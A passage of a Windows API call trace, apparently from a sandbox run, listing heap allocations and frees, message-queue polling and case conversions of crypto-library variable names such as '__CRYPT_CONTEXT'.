(HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cee0 [0034.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889508 [0034.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca30 [0034.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c790 [0034.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a60 [0034.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c820 [0034.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0034.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0034.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0034.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0034.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0034.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0034.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0034.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0034.571] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0034.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0034.571] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0034.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.571] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cec8 [0034.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0034.572] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0034.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0034.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0034.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0034.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0034.572] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0034.572] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0034.572] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0034.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0034.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0034.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0034.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0034.572] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0034.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0034.573] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0034.574] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0034.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c898 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0034.574] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.574] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb80 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0034.574] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0034.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8e0 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd78 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce50 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889220 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8896a0 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7a8 [0034.574] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c868 [0034.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0034.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0034.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0034.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0034.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0034.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0034.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0034.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0034.575] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0034.575] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0034.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.575] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb80 [0034.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0034.575] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0034.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0034.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0034.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0034.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0034.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0034.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0034.576] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0034.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0034.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0034.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.576] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c868 [0034.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0034.576] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0034.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0034.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0034.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0034.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0034.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0034.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0034.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0034.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0034.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0034.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0034.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0034.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0034.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0034.577] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0034.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889610 [0034.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0034.577] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0034.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0034.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0034.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0034.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0034.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0034.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0034.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0034.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0034.577] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0034.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0034.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0034.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0034.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0034.578] HeapFree (in: hHeap=0x770000, 